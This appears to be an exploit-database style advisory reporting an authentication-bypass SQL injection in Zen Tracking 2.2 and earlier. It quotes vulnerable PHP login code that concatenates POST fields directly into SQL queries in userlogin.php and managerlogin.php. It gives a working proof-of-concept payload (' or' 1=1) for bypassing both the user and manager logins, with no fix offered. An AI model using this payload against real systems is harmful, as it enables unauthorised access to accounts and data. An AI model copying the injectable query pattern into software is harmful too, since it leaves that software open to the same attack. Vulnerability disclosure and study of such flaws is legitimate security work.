扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 |
[+] Zen Tracking <= 2.2 (Auth Bypass) SQL Injection Vulnerability [+] Discovered by cr4wl3r <cr4wl3r[!]linuxmail.org> [+] Download : http://scripts.ringsworld.com/calendars/zentimetracking/ [+] Vuln Code : [userlogin.php] if (!empty($_POST['password'])) { $username =$_POST['username']; $password =$_POST['password']; dbConnect(); $result1 = mysql_query("select * from ".$tbluser." where username='". $username ."' and password='". $password ."'".mysql_error()); [+] PoC : [ZenTracking_path]/userlogin.php username: ' or' 1=1 Password: ' or' 1=1 [+] Vuln Code : [managerlogin.php] if (!empty($_POST['password'])) { $username =$_POST['username']; $password =$_POST['password']; dbConnect(); $result1 = mysql_query("select * from ".$tblmanager." where username='". $username ."' and password='". $password ."'".mysql_error()); [+] PoC : [ZenTracking_path]/managerlogin.php username: ' or' 1=1 Password: ' or' 1=1 |
体验盒子
